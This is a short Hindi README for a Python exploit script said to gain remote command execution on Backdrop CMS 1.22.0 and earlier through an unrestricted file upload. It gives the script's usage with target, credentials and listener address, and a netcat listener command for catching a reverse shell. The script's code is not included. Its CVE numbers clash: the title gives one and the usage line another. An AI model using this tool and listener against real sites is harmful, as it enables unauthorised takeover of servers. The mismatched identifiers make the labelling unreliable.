
CVE-2023-46818 Python3 शोषण Backdrop CMS <= 1.22.0 के लिए प्रमाणित रिमोट कमांड निष्पादन (RCE)
यह पायथन एक्सप्लॉइट स्क्रिप्ट Backdrop CMS में एक असीमित फ़ाइल अपलोड को लक्ष्य करती है ताकि रिमोट कोड एक्ज़ीक्यूशन (RCE) प्राप्त किया जा सके।
संस्करण 1.22.0 और इससे पहले के संस्करण नोट: Backdrop CMS इसका खंडन करता है और तर्क देता है कि उन्नत अनुमतियाँ आवश्यक हैं, यही कारण है कि यह 1.22.0 से ऊपर के संस्करणों में अभी भी मौजूद हो सकता है। मेरा अनुमान है कि उनका मतलब है कि आपके पास पहले व्यवस्थापक पहुँच होनी चाहिए। फिर भी, यह एक वैध कमजोरी है, और इसे पूर्ण सिस्टम नियंत्रण प्राप्त करने के लिए निश्चित रूप से शोषित किया जा सकता है।
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
महत्वपूर्ण: स्क्रिप्ट चलाने से पहले अपना लिसनर शुरू करें:
nc -lvnp <listener_port>
